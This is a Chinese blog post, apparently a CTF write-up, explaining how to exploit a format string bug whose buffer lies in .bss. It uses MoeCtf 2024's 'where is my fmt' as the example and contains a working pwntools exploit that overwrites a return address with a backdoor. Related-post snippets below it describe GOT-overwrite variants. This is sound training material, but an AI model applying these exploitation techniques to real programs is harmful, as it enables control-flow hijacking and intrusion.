PWN--非栈上格式化字符串漏洞

于 2024-10-06 21:08:53 发布
阅读量75 收藏
点赞数 3
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79542511/article/details/142730678
版权

简介

最近刷题碰到了非栈上的格式化字符串漏洞。

这类题的特点是格式化字符串不在栈上,那么就不能用fmt_str工具来任意地址写了,而是必须要自己手搓。

那么如何手搓呢?

主要是利用%kc和%k$hn(双字节)或者%k$hhn(单字节)。

%kc(k是一个整数)的作用是打印k个空字符,这样的话可以控制%k$n写入的值。

%k$n的作用是对于第k个参数(必须是指针类型),往其指向的地址写入已打印的字符个数。

具体如何操作,请看例题。

例题 MoeCtf 2024--where is my fmt

buf在bss段,然后给了三次格式化字符串漏洞。

第一次printf的栈:

 大体思路就是,先利用第一次printf泄露栈地址和libc地址(本题有后门,可以不用)

然后修改某个函数的返回地址为backdoor地址。

比如说,上面红框里面是vul函数的返回地址,我们是不能直接修改这个值的。

例如这种情况,栈地址-->addr2--->addr3,已知栈地址是第几个参数,我们能修改的是addr3。

栈上一般都有一些符合上述形式的链,如蓝色筐。我们可以修改addr3为0x7ffd9784e138(vul函数返回地址在栈上的位置)。

这样的话,我们只需要知道addr2是第几个参数,那么我们就可以通过addr2-->addr3--->vul_ret_addr 来修改vul函数的返回地址。

ps:在做题的时候,我发现一次printf只能使用一次%k$n,具体原因不明。

exp

from pwn import *
from pwncli import *
context(os='linux', arch='amd64', log_level='debug')


p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')

def debug():
    gdb.attach(p)
    pause()

#先泄露栈地址和libc地址

p.recvuntil(b'chances.\n')
payload = b'%8$p %7$p'
debug()
p.send(payload)
stack_addr = int(p.recv(14),16) 
stack_vul_ret = stack_addr + (0x7ffd128984d8-0x7ffd128984e0)
log.success('vul_ret:'+hex(stack_vul_ret))
backdoor = 0x401205

#修改成栈地址->addr1->addr2(改成main_ret)
p.recvuntil(b'chances.\n')
payload2 = b'%'+str(stack_vul_ret & 0xffff).encode()+b'c'
payload2+=b'%15$hn'

# debug()
p.send(payload2)
p.recvuntil(b'chances.\n')
payload3 = b'%'+str(backdoor&0xffff).encode()+b'c'+b'%45$hn' 

p.send(payload3)
p.interactive()

AttackingLin
关注
[CTF]PWN--非栈格式化字符串漏洞
2301_79880752的博客
02-26 2303
一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用%c%n的方法改写入地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,也就是非栈格式化字符串漏洞,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写。本文主要为大家介绍BSS段上的格式化字符串漏洞的解法。
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 2229
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
非栈上的格式化字符串漏洞
Grxer的博客
03-20 831
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got表也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
PWN-scanf函数的格式化字符串漏洞利用
T_aXin的博客
07-08 1198
栈帧销毁时栈上的数据并不会被清除,只是改变了寄存器rbp和rsp的位置而已,所以栈上还保留了之前printf函数执行时产生的canary,可以通过抬栈的方式将变量v1指向之前产生的canary,然后利用scanf的格式化字符串漏洞和printf函数泄露canary即可。(\x20相当于回车)此时rax与rdi指向的就是变量v1在栈上的分布,其内容就是canary,然后输入字符或字符串使程序识别不到双精度浮点数,所以不会对栈上的数据进行覆盖,然后再用printf函数就可以输出canary的内容了。
[CTF]PWN--手搓格式化字符串漏洞
2301_79880752的博客
02-19 1161
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个栈地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于栈里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
非栈格式化字符串漏洞
2302_79813730的博客
02-21 988
如图,红色框为a-b-c,我们可以利用格式化字符串漏洞更改c为蓝色框的第一个地址,这样我们就得到a-b-c-d,有这个我们一定可以找到b-c-d,这样我们就可以把d改成one_gadget的地址,d正好是main函数的返回地址,我们一般修改的也是这个。但这样实际是行不通的,通过调试我们可以看到三次更改的都是尾字节,为什么呢,原因就在于非栈上,每一次更改都要有对应的返回地址,这是第一次的,第二次要修改的是中间两字节,在原本基础上+2就可以了,第三次原理相似(想学堆上的可以自己去搜索,我目前也没学到。
非栈上的格式化字符串漏洞(bss段)-playfmt
zhuo1358的博客
07-22 893
已buu上的hitcontraining_playfmt为例没有开FULL RELRO,也就是说got表可改,那么我们的思路就是把printf的got表改成system,输入/bin/sh即可拿到shell最终exp把libc地址抓进栈中因为libc的地址只有低8位不同,通过写入低字节把printf_got抓到栈中把print_got+2抓入栈中(把print_got改成system要一半一半的改)把printf_got改成systemnum2是计算用来进行格式字符串漏洞利用时的一个重要部分。
手搓payload+非栈格式化字符串
2301_79880074的博客
02-22 1244
格式化字符串漏洞类型题中我们可以利用payload = fmtstr_payload(offset,{printf_got:system_plt})这个工具去修改地址,但是这个工具产生的字节数是很大的,有时候我们是无法去正常利用的,我们需要去自己构造payload修改地址。
非栈上的格式化字符串利用例题讲解
fzucaicai的博客
03-06 788
具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成。改got只能一次成型,因为如果分多次,导致printf的got表改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。,然后修改指针指向的对应内容。
PWN-非栈格式化字符串漏洞
最新发布
10-06
PWN-非栈格式化字符串漏洞
BUUCTF-PWN刷题记录-18(格式化字符串漏洞
weixin_44145820的博客
05-08 1809
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
CTF pwn题之格式化字符串漏洞详解
热门推荐
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
pwn-格式化字符串漏洞
admin的博客
10-09 380
部分基础知识来自于CTF-wiki。 原理介绍 - CTF Wiki (ctf-wiki.org) 常见的有格式化字符串函数有 输入 scanf 输出 函数 基本介绍 printf 输出到 stdout fprintf 输出到指定 FILE 流 vprintf 根据参数列表格式化输出到 stdout vfprintf 根据参数列表格式化输出到指定 FILE 流 sprintf 输出到字符串 snprintf 输出指定字节数..
网络安全概述:从认知到实践
l1x1n0的博客
10-04 498
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
如何安全地大规模部署 GenAI 应用程序
网络研究观
10-06 419
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1322
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
企业间图文档发放:如何在保障安全的同时提升效率?
文件数据安全交换
09-29 766
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。《Ftrans B2B企业间文件安全交换系统》仅需通用浏览器即可使用,用户界面清晰明了,功能操作和收发流程简单便捷,可快速在企业内外部推行,实现安全的图文档发放,极大降低用户学习成本,提升终端用户满意度,为企业内外部的业务协作提供保障。
安全服务面试
m0_74402888的博客
09-28 893
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值